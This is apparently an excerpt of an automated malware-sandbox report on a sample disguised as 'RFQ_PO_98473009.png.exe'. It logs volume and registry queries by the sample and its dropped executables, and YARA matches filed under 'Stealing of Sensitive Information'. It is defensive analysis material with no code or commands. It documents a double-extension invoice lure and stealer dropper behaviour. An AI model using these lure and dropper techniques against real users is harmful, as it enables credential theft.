Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,10_2_00412A15
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
